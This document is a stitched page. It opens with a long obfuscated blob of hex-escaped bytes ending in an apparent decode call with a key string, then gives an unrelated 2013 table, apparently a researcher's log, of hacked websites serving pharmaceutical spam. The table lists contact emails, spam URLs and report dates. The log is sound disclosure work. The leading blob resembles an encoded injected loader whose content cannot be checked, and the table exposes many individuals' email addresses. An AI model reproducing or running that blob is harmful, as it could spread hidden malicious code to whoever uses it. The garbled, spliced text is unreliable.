x0e\x22\x19C\x08\x07f\x60\x2b\x2aG\x1a\x1cC2\x13\x26\x7ec\x26G\x09\x1c\x2c\ x0e\x2a\x05\x017\x03\x3e6T76\x1e\x19\x04\x2a\x07\x03\x08xq\x0c\x3b\x08\x2b\ x05\x1e\x07\x3fY\x7bB7\x08\x1dle\x2a9d\x06Fxi\x01G\x19r1\x18\x3bzC\x3e\x0eg \x16F\x29\x22\x00\x22\x09\x11\x2767\x5cn5\x3a\x1f\x3a9\x23\x01i\x16\x1d8gdA A\x27\x09\x04e\x03\x2ab\x3a\x25\x259\x0d\x20P\x7d9\x22\x2c\x07\x29\x15\x12\ x2eA\x0aK\x13\x1cv\x3fy\x23\x3c\x0b\x1a9\x08\x02\x01\x3f\x19\x2dEe\x04\x2d\ x5d\x0e\x11\x5eA\x02\x2c\x16\x0b\x01\x00\x01\x22v\x071\x16\x07\x17\x5f\x17\ x7e\x023\x06Y\x00\x7dh2\x13\x05\x1a\x1d\x12\x3eu\x08\x00W\x06U\x21\x13\x3b\ x20l\x00\x0b\x11\x3cTa\x0a\x18dC9\x03\x06\x07\x1a\x07E\x27j\x17\x5ba\x5c\x0 7\x03\x23k2C\x2bA\x0e\x04\x03\x2fx\x15\x08\x23\x08r\x0aw\x18\x06\x1d\x23\x0 1u\x16\x00mkL\x0eU39Fz\x28Z\x2f\x25\x29\x00\x22\x18\x240k\x21sS\x04\x23g\x1 7\x7e\x1b\x1e\x2aD\x25c\x2d4\x07\x04M\x5d\x29\x5f\x14FqhA4\x28\x2c\x14\x2d\ x3f1\x1c\x5b\x3f\x3c22Gl\x01gfK\x2b2\x23\x06XD3\x0d2L\x217\x00\x0f\x0d\x00r \x17\x7e\x3a\x0a\x1a\x7f\x02\x162\x22\x0d6\x2d\x10\x1c9S\x7fq\x7e\x5bDZr\x1 d\x3f\x0a\x0bdz\x08\x2bIRo\x1f1\x3f\x02pZ\x14\x2e\x5fe\x042x\x7b\x2b\x0baP\ x3bL9\x1fk\x20\x10\x12L\x00j\x3b\x2cq\x0ds\x05cW9\x138\x11n\x16\x00\x07\x04 \x06\x7e\x3eAe\x28\x17\x3e\x0e\x04\x0a\x1015\x00a3\x0b5\x04\x1ak\x7d\x3e\x2 as\x2f\x1016\x1eE8\x1e\x3b8\x2b1=O\x7e\x12\x2d3\x2eU\x09\x10\x0foVOY\x5dF\x 3aX\x06\x15f\x08l\x17\x2b\x2e\x1a\x2cb\x7e\x1a\x17\x275\x09y\x1b\x125\x2e\x 19G\x1e\x2a\x0f\x17A\x3b\x13h\x27\x0bJ\x1c\x60\x0c\x13\x01\x3a\x5e\x16\x228 3\x28\x04\x0d7\x19XD\x1c0tL\x05\x5d\x03=s\x073u\x09\x0c\x24\x1b\x27F\x12g\x 26ht\x1c\x2d\x12\x03\x2b\x3b\x01\x1bf0\x0dvS\x3c\x06\x2bg\x1b\x21\x24\x06\x 1aL4\x17n\x2d\x02\x21\x2e\x15\x7f\x2c\x0fm\x07\x2aU2n\x1cw\x26\x7c9BG\x041\ x275\x0b\x1b\x08\x2a2\x25d\x0a\x2a\x07\x0fs\x24\x09\x23x\x5dL\x2aD\x05e\x3c 0\x07\x1e\x01o\x20\x17j\x1b\x20\x1d79\x1e\x043\x3b7S\x29\x23\x03R\x1cR\x15\ x199\x29\x06C\x030q\x10n\x7c\x25\x06\x0d\x25\x1d\x0a\x2a\x27\x0b\x1b\x21H\x 233\x144qtD\x20\x04r\x60\x0by\x10\x14r\x01\x21t7\x2b\x17\x095u1\x1bd\x088\x 1a7\x2d\x5c5\x2e=\x04\x1axef\x23\x3a\x7bC\x0ct\x7d\x00\x0e\x13\x3e\x16Y0\x0 3\x0ac\x16Y013\x2d\x5b\x2a\x1fV\x1e\x3b\x7f\x08\x00\x11I\x3aK0\x13\x0f\x1c5 \x1b\x1f\x04d\x13\x032\x0du\x1b\x2c\x0b\x19\x17\x5dEP\x3a5W\x02\x1dv\x5c54\ x01W=h\x3fSz\x1e\x5c\x1bV\x3a\x01\x03\x02\x16\x23Hz\x2a\x7b\x0b\x03\x0d\x1b \x0b\x06\x19Te\x29D\x2biU\x10\x07\x3f\x1a\x04\x0d5\x3f9\x0c\x0aSG\x1d\x1f\x 7bX\x21\x04\x19\x3f\x1c\x03\x14\x0e\x119\x28\x27j\x2d\x7c\x111z\x1cy\x1d\x0 3\x05\x27U12\x13\x26\x0d4\x3a\x5bO\x3a3\x18\x2c\x25q\x23J\x23x\x07\x3f\x23\ x23\x00\x27\x18\x24\x15w\x01\x3e\x40gNdoj\x251\x1c\x1cY\x04=\x10\x11V\x5dv\ x0e1\x2d\x0b6\x06\x1a\x0fY7\x2f0\x3f\x11V\x05\x13\x5eow=\x2c0\x06C\x7ev\x17 l\x3f\x2d\x1e0i\x03X\x1dC\x13\x18\x28\x1euf0\x01M\x11\x20\x21C\x0b\x19\x26\ x29\x0d\x06\x0d\x0a\x21\x21\x7e\x3c4f\x20\x1f\x23\x0a\x10\x23\x16\x08\x10r\ x0e\x3c\x3a8\x27\x0et5\x3cr\x3c\x0c\x01V\x0432x\x3c\x11\x10\x0c\x1e8\x05s\x 0aaaz\x1d2\x3c\x1d\x22\x0d\x3f\x0e\x00\x1a\x3f\x17\x23l\x0a\x05E\x19Y\x02\x 1eS0\x18\x11\x40=\x7bz1I\x02\x16\x02\x04\x7e\x1a\x22\x3c\x0cC\x3c\x7d8\x05\ x21\x05S\x02\x16\x3fe\x00\x25l\x087\x24\x1b\x06D\x2db\x00\x02\x3c\x12T\x17\ x0a\x0175Ja\x0do6\x024\x04\x20\x054\x0f\x2a\x26\x06=4\x3e\x1f\x207\x2d\x15\ x18\x27\x5c\x24\x2c\x3f\x0655k\x014\x3f6\x08i\x22B\x163f\x40\x08\x22rlCE\x0 a\x02\x22\x24\x02XX\x17\x3f63\x2c7\x065\x16\x2c\x22\x14\x20\x21\x23\x18v\x7 eS\x2cg\x14\x2b\x1aDb\x097\x3ev\x09\x16k\x3b\x04\x16\x2a\x3f\x09\x211\x2aXz ag\x2c8XWA\x11\x0e\x3b9\x04\x182\x07\x2f\x21\x5d\x7dsy\x289\x60\x12\x15\x7b \x40a\x0b\x013\x3e\x19\x2cy\x28\x1f\x1a\x3e\x03\x02\x2do\x1b\x10u\x04\x27\x 1d\x1474\x1b\x0dA\x06\x27\x1d0\x0f\x5cB\x3a\x07\x1bh\x1a\x40\x25\x5f\x1f\x0 1Cx\x27\x1bo\x2a\x19\x13\x22W\x3f\x01\x1a3X\x0a\x0a\x1ba6\x60\x27\x21=\x20k \x1aT\x13\x3ao\x25\x04WqNIQLHE\x5f", "IwOIddDwZObky1eqwBAZlfY");
Organization | Emails | Malicious URL |
---|---|---|
Hits for "Viagra" | ||
Hit 11. kim-stafford.com Writer in Oregon |
Whois leads to: abuse@godaddy.com krs@lclark.edu Reported on 11-30-13 |
http://kim-stafford.com/?lze=810
Directly hosted page |
Hit 31-21. rvrphoto.com Photography in Ohio |
rkoti@me.com abuse@godaddy.com vamsi@vam.si Reported on 11-30-13 |
http://rvrphoto.com/www-viagra-sales/ http://rvrphoto.com/ed-50mg-viagra/ |
Linked from an infected page: bioimagexd.net Open Source Medical Imaging Software |
info@bioimagexd.net support@netfirms.com lassi.paavolainen@jyu.fi Reported on 11-30-13 |
http://www.bioimagexd.net/www-viagra-uk/ http://www.bioimagexd.net/on-viagra-spain/ http://www.bioimagexd.net/www-buy-viagra-on-the-internet/ http://www.bioimagexd.net/med-50mg-viagra/ |
Linked from an infected page: annehills.com Singer |
booking@annehills.com anne@annehills.com abyse@web.com annehills@juno.com mark-web@singout.org robbietrapp@hotmail.com Reported on 11-30-13 |
http://www.annehills.com/md-cheap-viagra-from-canada/ |
Hit 33: thejameshouse.org Help for persons who have been sexually abused, in Virginia |
chana@thejameshouse.org jane@thejameshouse.org Reported on 11-30-13 |
http://thejameshouse.org/?an=784 |
Hit 34: africanamericansoul.com |
abuse@godaddy.com AFRICANAMERICANSOUL.COM@domainsbyproxy.com Reported on 11-30-13 |
http://africanamericansoul.com/?jnk=284 |
Hit 35: dfma.org Durham FM Association |
http://dfma.org/index.php?option=com_contact&view=contact&id=1&Itemid=24
Reported on 11-30-13 |
http://dfma.org/?yx=795 |
Hit 36: jasonshaeffer.com |
support@netfirms.com jasonshaeffer@gmail.com Reported on 11-30-13 |
http://jasonshaeffer.com/web-viagra-rx/ |
Hit 37: sikorskyarchives.com CT |
iisha@snet.net LIBERTINO481@YAHOO.COM abuse@godaddy.com johnmk26@optonline.net Reported on 11-30-13 |
http://www.annehills.com/md-cheap-viagra-from-canada/ |
Hit 39: gingergrayhamartgallery.com Site looks abandoned since 2002 |
josh@coyote-canyon.com abuse@wildwestdomains.com GINGERGRAYHAMARTGALLERY.COM@domainsbyproxy.com Reported on 11-30-13 |
http://gingergrayhamartgallery.com/?ib=629 |
Hit 40. www.abeewell.com |
Registered in Russia, no real website, no one to notify |
http://www.abeewell.com/ |
Hits for "Cialis" | ||
Hit 11. huwib.org Harvard Undergraduate Women in Business, On-Campus, Harvard, MA |
kshankar@huwib.org rwang@huwib.org hlim@college.harvard.edu info@huwib.org Reported on 11-30-13 |
http://huwib.org/?mfh=798 |
Hits 12-16. seamass.org Strutural Engineers Association of MA |
Contact page missing, but Google cache has one from Nov. 1, 2013 Officers page missing About page missing Google says "This site may be hacked"
info@seamass.org Reported on 11-30-13 |
http://www.seamass.org/cialis-action/ http://www.seamass.org/the-cialis-commercial/ http://www.seamass.org/dr-cialis/ http://www.seamass.org/a-cialis-dosage/ http://www.seamass.org/cialis-in-botlle/ |
Hits 17-21. honorflighttwincities.org MN |
crazyjerry45@hotmail.com abuse@honorflighttwincities.org security@honorflighttwincities.org Reported on 11-30-13 |
http://honorflighttwincities.org/a-carvedilol-cialis/ http://honorflighttwincities.org/ed-cialis-action/ http://honorflighttwincities.org/a-cialis-action/ http://honorflighttwincities.org/now-5mg-cialis/ |
Hit 23. musehousecenter.com |
musehousecenter@gmail.com abuse@web.com em@a2pwebdesignn.com webmaster@a2pwebdesignn.com Reported on 11-30-13 |
http://musehousecenter.com/?pav=852 |
Hit 25.laennecsocietyphilly.org |
laennecsocietyphilly.org/cialis-pills/ Home page hacked, and many others, including the contact page | |
Hit 26. krcs.org The Kansas Respiratory Care Society |
suzanne.bollig@haysmed.com curtis.kidwell@viachristi.org dconyers@kumc.edu Reported on 11-30-13 |
http://krcs.org/?mu=957 |
Hit 28. shoplocalunioncounty.org |
info@shoplocalunioncounty.org ispwebmaster@nrtc.coop ispwebmaster@nrtc.org Reported on 11-30-13 |
http://shoplocalunioncounty.org/?yh=655 |
Hit 29. lindsay-stern.com |
lstern13@amherst.edu editor@scramblerbooks.com Reported on 11-30-13 |
http://lindsay-stern.com/?sx=701 |
Hit 36. kayakcentre.com RI |
funn@kayakcentre.com abuse@web.com Reported on 11-30-13 |
http://kayakcentre.com/?nlc=4 |
Hits 37-38. www.ncherm.org Safer Schools in PA |
brett@ncherm.org daniel@atixa.org kate@ncherm.org Reported on 11-30-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=37&ved=0CGUQFjAGOB4&url=http%3A%2F%2Fwww.ncherm.org%2F%3Fid%3D523163&ei=CWGaUrnQIMzmoATosYGgBA&usg=AFQjCNH364-8GMxasYfp3NRR-O28jyCYGg&sig2=a-YGpqrOUYHMwpyafcBnlQ&bvm=bv.57155469,d.cGU
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=38&ved=0CGwQFjAHOB4&url=http%3A%2F%2Fwww.ncherm.org%2F%3Fid%3D523146&ei=CWGaUrnQIMzmoATosYGgBA&usg=AFQjCNEaX0pKE5rm6vgGxLnaawb7nc5HrA&sig2=Evx-gEJC8Ft29ZMuCLDcWw&bvm=bv.57155469,d.cGU |
Hits for "Levitra" | ||
Hit 20. elupton.com Art critic in NYC, works at the Smithsonian |
abuse@web.com cooperhewittpress@si.edu cheducation@si.edu
Reported on 11-30-13
|
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CIwBEBYwCTgK&url=http%3A%2F%2Felupton.com%2Flevitra-online-shopping%2F&ei=anSaUt23CcL3oATa64DQCw&usg=AFQjCNHCTfQkSNjiD1Pg277HR2mkACDLiQ&sig2=aGO9sPWuMV-iTEKkLQJYpA&bvm=bv.57155469,d.cGU&cad=rja |
Hit 24. nintendoeverything.com |
http://nintendoeverything.com/contact-us/ Informed on 11-30-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=24&ved=0CE8QFjADOBQ&url=http%3A%2F%2Fnintendoeverything.com%2Flevitra-overnight%2F&ei=EHeaUt3CGNDhoAScmoLoDA&usg=AFQjCNGUMuBxkohDi73l49gNteVswgpZwA&sig2=A9K4p0NwxpKirvLQiR-VLw&bvm=bv.57155469,d.cGU |
Hit 32. www.thesmell.org Los Angeles Art Space |
http://www.thesmell.org/contact
Informed on 11-30-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=32&ved=0CE0QFjABOB4&url=http%3A%2F%2Fwww.thesmell.org%2F&ei=YnmaUv6wN4n3oASg5ICoCA&usg=AFQjCNFyvDQw020irw1tkS0kbveE9cYflw&sig2=3iknvwdTneGHEMpZHtGWtg&bvm=bv.57155469,d.cGU |
Hits for "buy oxycontin online" | ||
Hit 37. gravatar.com |
compliance@markmonitor.com domains@automattic.com Informed on 11-30-13 |
gravatar.com/seroxycontiner |
Hit 47. www.wpda.org World Parksinson Disease Association |
info@wpda.org aip@fondazioneparkinson.com gianluca@parkinson.it support@register.it Informed on 11-30-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=47&ved=0CFoQFjAGOCg&url=http%3A%2F%2Fwww.wpda.org%2Fappuntamenti.html&ei=UH6aUrvEA8zjoAT4lIKQDw&usg=AFQjCNGNQuJ5VcTxDyyoJnGod70cYSlNKA&sig2=1pKfr7eeBoHHgZb4ARetzw&bvm=bv.57155469,d.cGU |
Hits for "buy oxy" | ||
Hit 25. https://archive.org/ |
info@archive.org
Informed on 11-30-13 |
https://archive.org/details/Oxy5Mg30Mg |
Hits for "vardenafil" | ||
Hit 26. hugetheater.com |
butch@hugetheater.com jill@hugetheater.com Contacted 11-30-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=26&ved=0CFoQFjAFOBQ&url=http%3A%2F%2Fwww.hugetheater.com%2Fabout-us%2Fdonate%2F&ei=tZ6aUsa8DZbcoASHvICYCA&usg=AFQjCNHIvCeV7jqz6PPDQW-gGhSuCOi3Fg&sig2=dhKAVGdbEftOyy58dQMYYA&bvm=bv.57155469,d.cGU |
Hit 29. thedeadexs.com |
info@thedeadexs.com Informed on 11-30-13 |
http://thedeadexs.com/vardenafil/ |
Hit 32. actualidad7.com |
ad@actualidad7.com redaccion@actualidad7.com Informed on 11-30-13 |
http://actualidad7.com/cheapest-vardenafil/ |
Hit 33. aceita.com.br |
negocios@aceita.com.br suporte@aceita.com.br Informed on 11-30-13 |
http://aceita.com.br/vardenafil-hcl-20mg/ |
Hit 38. larryelmore.com |
sales@larryelmore.com Informed on 11-30-13 |
http://larryelmore.com/vardenafil-cheapest/ |
Hits for "284-3222" | ||
Hit 7. www.whereisasturias.com |
Twitter: @whereisasturias Informed 12-1-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CF8QFjAG&url=http%3A%2F%2Fwww.whereisasturias.com%2Fcanada%2F%3Fa%3D322&ei=eJabUsr-KIXUoASo-YLIAQ&usg=AFQjCNE0qR8SUJi4t9Qr_I7c2yypUR0LmQ&sig2=COhUDi7uTC6VtrrA77EKig&bvm=bv.57155469,d.cGU |
Hit 8. www.nlsd113.com Northern Lights School Division, Canada |
centraloffice@nlsd113.net suboffice@nlsd113.net Informed 12-1-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGYQFjAH&url=http%3A%2F%2Fwww.nlsd113.com%2Frr%2Findex.php%3Fp%3D859&ei=eJabUsr-KIXUoASo-YLIAQ&usg=AFQjCNEhHshG2GZ5KQAapm1uGpcm9JfyOw&sig2=Iu19xuS3akpXaZcswkP5HA&bvm=bv.57155469,d.cGU |
Hits for "buy armidex" | ||
Hit 1. healthyagingcouncil.org unthsc.edu U. of N. texas |
UNTSweb@untsystem.edu webmaster@unthsc.edu urcm@unt.edu Informed 12-1-13 |
http://www.healthyagingcouncil.org/getarimidex/ |
Hit 5. www.purevolume.com Music promoter |
randy@purevolume.com vchang@spinmedia.com brittany@purevolume.com Informed 12-1-13 |
http://www.purevolume.com/arimidex |
Hit 6. www.zestcreative.ie Design co. in Ireland |
info@zestcreative.ie Informed 12-1-13 |
http://www.zestcreative.ie/rev/.svn/arimidex.html |
Hit 9. flavors.me |
http://us.moo.com/help/contact-us.html
Informed 12-1-13 |
http://flavors.me/midelle |
Hit 10. www.bainesdesign.co.uk |
info@bainesdesign.co.uk hello@barleyhousegroup.co.uk Informed 12-1-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0CIYBEBYwCg&url=http%3A%2F%2Fwww.bainesdesign.co.uk%2F%3Fp%3Dbuy-arimidex%26k%3D5&ei=KpqbUvb6LofooASFjYGoAw&usg=AFQjCNEYQD_mcQ8rfHm4V2z1Uy0Yr6qnWA&sig2=5oDKCKKgEsK5_ZUaLwRxvQ&bvm=bv.57155469,d.cGU |
Hit 14. cafemomentum.org Restaurant in Dallas, TX |
jef@tingleycomm.com chad@cafemomentum.org Informed 12-1-13 |
http://cafemomentum.org/products/buyarimidex/ |
Hit 20. kingamplification.com Guitar store in CA |
val@kingamplification.com Informed 12-1-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CIcBEBYwCTgK&url=http%3A%2F%2Fkingamplification.com%2Farimidex.html&ei=PaKbUrKTKI7roAT0kYDYBw&usg=AFQjCNFUQIlb--0VoKgKXsusVsfjpqGBOQ&sig2=prWvmOykCCSfC0ksfpBjTg&bvm=bv.57155469,d.cGU |
Mustafa Al-BassamIndeed I do!
@musalbas
Why is the U.S. government running an online Canadian Viagra store? chambersburgpa.gov/oldwebsite/
Bill Schnift
@BillSchnift
@musalbas @sambowne loves this stuff.
Organization | Emails | Malicious URL |
---|---|---|
Hits for "inurl:.gov intitle:viagra" | ||
Hit 3. www.winchester-in.gov City of Winchester, Indiana |
druss@egovstrategies.com mayor@winchester-in.gov Reported on 12-12-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CEUQFjAC&url=http%3A%2F%2Fbuy-viagra.winchester-in.gov%2F937.html&ei=WwWqUqSpO4XdoASlyILYDQ&usg=AFQjCNGTNFay1K9j6b7W9uI3HqhZ_pSQIQ&sig2=Aq9hfsg6_DwPIowI2IL4HQ&bvm=bv.57967247,d.cGU
Only visible from Google link |
Hit 5. www.gsnmagazine.com Government Security News |
jgoodwin@gsnmagazine.com mccabe@gsnmagazine.com Reported on 12-12-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CFMQFjAE&url=http%3A%2F%2Fwww.gsnmagazine.com%2Fnode%2F28233%3Fz3nub%3D414895&ei=WwWqUqSpO4XdoASlyILYDQ&usg=AFQjCNGC21DO-QJCwCECr0p9hiCnqK4AkA&sig2=l71g5B7a2Jzbb6EjaLwv1w&bvm=bv.57967247,d.cGU |
Hits for "inurl:.gov intitle:viagra" (Region: US) | ||
Hit 11. rivnet.com Riviera Telephone Co., Texas |
rtc.ofc@rivnet.com rtc@rivnet.com Reported on 12-12-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0CDYQFjAAOAo&url=http%3A%2F%2Frivnet.com%2Ffiles%2Fgov-uk-buy-viagra.html&ei=jQyqUteDFI3voATV1YEI&usg=AFQjCNFLOrW37ODZoFuG3Upsrcbp38DkYw&sig2=Q64ynabmgfQj_kcQNtZHng&bvm=bv.57967247,d.cGU |
Hit 13. www.s-5.com Roofing company in Colorado |
info@s-5solutions.com info@30dps.com Reported on 12-12-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=13&ved=0CEYQFjACOAo&url=http%3A%2F%2Fwww.s-5.com%2Fscm%2Fscm%2Fwestminster-gov-uk-viagra%2F&ei=jQyqUteDFI3voATV1YEI&usg=AFQjCNFYstWR-jxhLGG__fAGOPwjcnJswA&sig2=UhmmzrF23qIqnR9flmvAWw&bvm=bv.57967247,d.cGU |
Hit 17. www.wmuseumaa.org Westmoreland Museum, PA |
info@wmuseumaa.org membership@wmuseumaa.org Reported on 12-12-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&ved=0CGYQFjAGOAo&url=http%3A%2F%2Fwww.wmuseumaa.org%2Frfq%2Fwestminster-gov-uk-viagra%2F&ei=jQyqUteDFI3voATV1YEI&usg=AFQjCNH08xGofrj02rLKbF9IkLdQAh6h6Q&sig2=FY1z4oNR7GqcbEF9vTHv_g&bvm=bv.57967247,d.cGU |
Hit 30. www.jamescitycountyva.gov James City County VA |
County.Administration@jamescitycountyva.gov jccnews@jamescitycountyva.gov Reported on 12-12-13 |
http://www.jamescitycountyva.gov/online-viagra/ |
Hit 44. www.intgovforum.org Internet Governance Forum |
igf@unog.ch Reported on 12-12-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=34&ved=0CEMQFjADOB4&url=http%3A%2F%2Fwww.intgovforum.org%2Fcms%2Fdynamic-coalitions%2F72-ibr%3Faw50z%3D270581&ei=3g-qUr-4LNPdoAS5hID4DA&usg=AFQjCNG-CKzx7BiMANwYbjCY1Z3PrVmfWQ&sig2=k2i9iFMcwfgJfY2nPgm4iA&bvm=bv.57967247,d.cGU |
Hit 57. chambersburgpa.gov |
jwright@chambersburgpa.gov plagiovane@chambersburgpolice.com boroadmin@chambersburgpa.gov Reported on 12-12-13 |
http://www.chambersburgpa.gov/oldwebsite/ |
Hit 71. fabius-ny.gov Town of Fabius N.Y |
webmaster@fabius-ny.gov townclerk@fabius-ny.gov Reported on 12-12-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=62&ved=0CDIQFjABODw&url=http%3A%2F%2Fbuy-viagra.fabius-ny.gov%2F71.html&ei=BBKqUsvAIcP1oASjxIDoDQ&usg=AFQjCNFY_LNW_o_XwssjGWxPGA6YS2zzFQ&sig2=OAlm2-pKTZKBrTMgSzNYjQ&bvm=bv.57967247,d.cGU |